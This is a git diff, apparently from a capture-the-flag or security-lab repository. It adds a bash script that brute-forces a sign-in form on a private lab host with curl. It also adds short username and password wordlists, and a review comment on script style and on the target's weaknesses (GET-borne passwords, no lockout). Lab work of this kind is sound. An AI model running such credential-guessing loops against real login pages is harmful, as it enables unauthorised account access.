diff --git a/Admin_sql_injection/ressources/bruteforce.sh b/Admin_sql_injection/ressources/bruteforce.sh
new file mode 100644
index 0000000..9edfb24
--- /dev/null
+++ b/Admin_sql_injection/ressources/bruteforce.sh
@@ -0,0 +1,16 @@
+
+test_url() {
+ echo "test user $1, pass $2"
+ curl "http://10.12.248.148/?page=signin&username=$1&Login=Login&password=$2" 2> /dev/null | grep -i flag
+ if [ $? -eq 0 ]; then
+ echo "FOUND"
+ exit
+ fi
+}
+
+while read -r username; do
+ while read -r password; do
+ test_url "$username" "$password"
+ done < passwords.txt
+done < usernames.txt
+
diff --git a/Admin_sql_injection/ressources/passwords.txt b/Admin_sql_injection/ressources/passwords.txt
new file mode 100644
index 0000000..2ba36ce
--- /dev/null
+++ b/Admin_sql_injection/ressources/passwords.txt
@@ -0,0 +1,7 @@
+password
+password1
+qwerty
+12345678
+shadow
+admin
+111111
diff --git a/Admin_sql_injection/ressources/usernames.txt b/Admin_sql_injection/ressources/usernames.txt
new file mode 100644
index 0000000..3d2b7f8
--- /dev/null
+++ b/Admin_sql_injection/ressources/usernames.txt
@@ -0,0 +1,6 @@
+root
+admin
+test
+guest
+info
+adm
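Review bot: The new bruteforce.sh opens with a blank line instead of a shebang and has no header comment, so the interpreter and the intended scope are left implicit. I would start the file with `#!/usr/bin/env bash` and a comment such as `# Lab exercise helper: runs only against the training instance hard-coded in test_url.` In `test_url`, the separate `if [ $? -eq 0 ]; then` after the pipeline is fragile if a line is ever inserted between them. Testing the pipeline directly, `if curl "..." 2>/dev/null | grep -i flag; then`, keeps the same behaviour. For the accompanying write-up, the curl line shows the sign-in form taking the password in a GET query string, which typically leaves credentials in server and proxy logs. If a list this short is enough, the application presumably has no attempt throttling or lockout, and both points belong in the remediation notes.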